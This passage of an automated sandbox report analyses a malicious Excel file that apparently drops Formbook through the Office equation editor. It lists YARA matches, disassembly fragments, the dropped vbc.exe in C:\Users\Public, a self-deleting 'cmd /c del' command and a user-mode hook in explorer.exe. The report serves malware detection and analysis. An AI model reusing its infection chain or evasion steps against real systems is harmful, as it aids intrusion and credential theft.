Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0271E6C1	14_2_0271E6C1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02714680	14_2_02714680
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027457C3	14_2_027457C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0271C7BC	14_2_0271C7BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0279579A	14_2_0279579A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0274D47D	14_2_0274D47D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0279443E	14_2_0279443E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02745485	14_2_02745485
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02721489	14_2_02721489
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02756540	14_2_02756540
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0271351F	14_2_0271351F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0272C5F0	14_2_0272C5F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027C3A83	14_2_027C3A83
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02737B00	14_2_02737B00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0279DBDA	14_2_0279DBDA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0270FBD7	14_2_0270FBD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027BCBA4	14_2_027BCBA4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0273286D	14_2_0273286D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0271C85C	14_2_0271C85C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027AF8EE	14_2_027AF8EE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02795955	14_2_02795955
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0279394B	14_2_0279394B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027269FE	14_2_027269FE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027129B2	14_2_027129B2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027B098E	14_2_027B098E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0272EE4C	14_2_0272EE4C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02742E2F	14_2_02742E2F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0273DF7C	14_2_0273DF7C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02720F3F	14_2_02720F3F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02782FDC	14_2_02782FDC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027ACFB1	14_2_027ACFB1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0271CD5B	14_2_0271CD5B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02740D3B	14_2_02740D3B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027AFDDD	14_2_027AFDDD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0009E597	14_2_0009E597
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0009E8B2	14_2_0009E8B2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00082D90	14_2_00082D90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00089E2B	14_2_00089E2B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00089E30	14_2_00089E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00082FB0	14_2_00082FB0

Source: Doc7656.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\Public\vbc.exe	Code function: String function: 00AE3F92 appears 108 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A9E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00B0F970 appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A9DF5C appears 118 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00AE373B appears 238 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0277F970 appears 84 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02753F92 appears 132 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0275373B appears 244 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0270DF5C appears 119 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0270E2A8 appears 38 times

Source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: vbc.exe, 00000004.00000003.2203497479.0000000005720000.00000004.00000001.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\|
Source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp	Binary or memory string: C:\Users\Public\vbc.exe9405637-367336477-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbLC
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	Binary or memory string: C:\Users\Public\vbc.exe\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: vbc.exe, 00000004.00000002.2376141871.000000000027C000.00000004.00000020.sdmp	Binary or memory string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: vbc.exe, 00000004.00000003.2203497479.0000000005720000.00000004.00000001.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@17/21@23/6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Doc7656.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR54D.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .1.....x.......4.......................................................................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....................x...............................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....................x...............................e. .............................8..........s....	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...........................................2.......8.4.......4.....	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................D.4.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........@1........4.t...........0.......................&.................4.....	Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Doc7656.xlsx

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Doc7656.xlsx

Static file information: File size 2807296 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\| source: vbc.exe, 00000004.00000003.2203497479.0000000005720000.00000004.00000001.sdmp
Source:	Binary string: colorcpl.pdb source: vbc.exe, 0000000A.00000002.2236253130.00000000006B9000.00000004.00000020.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4vbc.PDB-F424491E3931}\Servererver32 source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: CmicC:\Users\Public\vbc.PDB# source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdb, source: vbc.exe, 00000004.00000002.2376278535.0000000000307000.00000004.00000020.sdmp
Source:	Binary string: C:\Users\Public\vbc.exe9405637-367336477-1006ic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbLC source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Public\vbc.exe\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, colorcpl.exe
Source:	Binary string: CnpMjVisualBasic.pdb source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: C(`1(PBjLC:\Windows\Microsoft.VisualBasic.pdb source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: $/C:\Users\Public\vbc.PDB# source: vbc.exe, 00000004.00000002.2376319137.0000000000438000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Public\vbc.exeualBasic.pdbpdbsic.pdboft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb.n source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbll source: vbc.exe, 00000004.00000002.2376278535.0000000000307000.00000004.00000020.sdmp
Source:	Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: vbc.exe, 00000004.00000002.2376141871.000000000027C000.00000004.00000020.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: vbc.exe, 00000004.00000003.2203497479.0000000005720000.00000004.00000001.sdmp

Source: Doc7656.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Doc7656.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E40BC push eax; retn 000Bh	4_2_001E40C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E4CC8 push esp; retf 000Bh	4_2_001E4CD1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E17F0 push eax; retn 000Bh	4_2_001E1819
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00407813 push ebx; retf	10_2_00407814
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0040E3C7 push ebp; ret	10_2_0040E439
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041E3DB push dword ptr [E3B6F57Dh]; ret	10_2_0041E3FC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00404444 push es; ret	10_2_00404445
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041E4B7 pushfd ; ret	10_2_0041E4B8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041CEF2 push eax; ret	10_2_0041CEF8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041CEFB push eax; ret	10_2_0041CF62
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041CEA5 push eax; ret	10_2_0041CEF8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041CF5C push eax; ret	10_2_0041CF62
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0040B728 push es; iretd	10_2_0040B72B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A9DFA1 push ecx; ret	10_2_00A9DFB4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0270DFA1 push ecx; ret	14_2_0270DFB4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0008E3C7 push ebp; ret	14_2_0008E439
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0009E3DB push dword ptr [E3B6F57Dh]; ret	14_2_0009E3FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00084444 push es; ret	14_2_00084445
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0009E4B7 pushfd ; ret	14_2_0009E4B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0008B728 push es; iretd	14_2_0008B72B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00087813 push ebx; retf	14_2_00087814
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0009CEA5 push eax; ret	14_2_0009CEF8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0009CEFB push eax; ret	14_2_0009CF62
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0009CEF2 push eax; ret	14_2_0009CEF8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0009CF5C push eax; ret	14_2_0009CF62

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\IMG-354635[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEE

Source: C:\Users\Public\vbc.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
